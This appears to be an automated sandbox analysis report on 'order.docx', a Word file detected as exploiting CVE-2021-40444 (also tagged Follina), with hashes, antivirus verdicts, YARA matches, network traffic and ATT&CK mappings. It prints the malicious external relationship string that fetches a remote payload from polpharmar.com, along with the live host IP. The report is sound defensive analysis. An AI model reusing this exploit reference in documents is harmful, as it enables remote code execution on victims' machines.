Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
order.docx

Overview

General Information

Sample Name:order.docx
Analysis ID:676557
MD5:8abea2d6c14af54c6eac09d158554085
SHA1:3802d9c8b3530fe7b140cbd4a12c3895c46077b2
SHA256:aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
Tags:docdocxFollina
Infos:

Detection

CVE-2021-40444
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected CVE-2021-40444 exploit
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1288 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x467:$a2: TargetMode="External"
  • 0x43a:$x1: .html!
document.xml.relsEXPL_CVE_2021_40444_Document_Rels_XMLDetects indicators found in weaponized documents that exploit CVE-2021-40444Jeremy Brown / @alteredbytes
  • 0x3f8:$b1: /relationships/oleObject
  • 0x412:$c1: Target="mhtml:http
  • 0x43f:$c2: !x-usc:http
  • 0x467:$c3: TargetMode="External"
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: order.docxAvira: detected
Source: order.docxReversingLabs: Detection: 69%

Exploits

barindex
Source: document.xml.relsExtracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficDNS query: name: polpharmar.com
Source: global trafficDNS query: name: polpharmar.com
Source: global trafficDNS query: name: polpharmar.com
Source: global trafficDNS query: name: polpharmar.com
Source: global trafficDNS query: name: polpharmar.com
Source: global trafficDNS query: name: polpharmar.com
Source: global trafficDNS query: name: polpharmar.com
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global trafficHTTP traffic detected: GET /test.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /test.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: THCPROJECTSRO THCPROJECTSRO
Source: ~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp.0.drString found in binary or memory: http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drString found in binary or memory: http://polpharmar.com/test.html%
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drString found in binary or memory: http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drString found in binary or memory: http://polpharmar.com/test.htmlyX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: polpharmar.com
Source: global trafficHTTP traffic detected: GET /test.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /test.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive
Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLEMatched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: order.docxReversingLabs: Detection: 69%
Source: order.LNK.0.drLNK file: ..\..\..\..\..\Desktop\order.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$order.docxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR74D1.tmpJump to behavior
Source: classification engineClassification label: mal68.expl.evad.winDOCX@1/20@7/1
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: order.docxInitial sample: OLE zip file path = word/media/image1.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: document.xml.relsExtracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts13
Exploitation for Client Execution
Path InterceptionPath Interception1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
Non-Application Layer Protocol
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Ingress Tool Transfer
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
order.docx69%ReversingLabsDocument-Office.Exploit.CVE-2021-40444
order.docx100%AviraEXP/CVE-2021-40444.Gen
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://polpharmar.com/test.htmlyX0%Avira URL Cloudsafe
http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html0%Avira URL Cloudsafe
http://polpharmar.com/test.html%0%Avira URL Cloudsafe
http://polpharmar.com/test.html0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
polpharmar.com
91.235.116.180
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://polpharmar.com/test.htmltrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://polpharmar.com/test.htmlyX~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drfalse
    • Avira URL Cloud: safe
    unknown
    http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drfalse
    • Avira URL Cloud: safe
    unknown
    http://polpharmar.com/test.html%~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.drfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    91.235.116.180
    polpharmar.comRomania
    51177THCPROJECTSROtrue
    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:676557
    Start date and time: 01/08/202210:48:372022-08-01 10:48:37 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 4s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:order.docx
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:10
    Number of new started drivers analysed:1
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.expl.evad.winDOCX@1/20@7/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .docx
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • VT rate limit hit for: order.docx
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    91.235.116.180IMG2_518876978.vbsGet hashmaliciousBrowse
      ITEMS 222940.exeGet hashmaliciousBrowse
        Wire_Notification_Preview08645.htmGet hashmaliciousBrowse
          56Reffpaymen#9989.exeGet hashmaliciousBrowse
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            THCPROJECTSROdoc09876780087667887667_doc .exeGet hashmaliciousBrowse
            • 91.235.116.232
            go.apkGet hashmaliciousBrowse
            • 91.235.116.232
            go.apkGet hashmaliciousBrowse
            • 91.235.116.232
            BARCLAYS_Swift.exeGet hashmaliciousBrowse
            • 91.235.116.231
            SecuriteInfo.com.Trojan.DownloaderNET.252.2087.exeGet hashmaliciousBrowse
            • 91.235.116.231
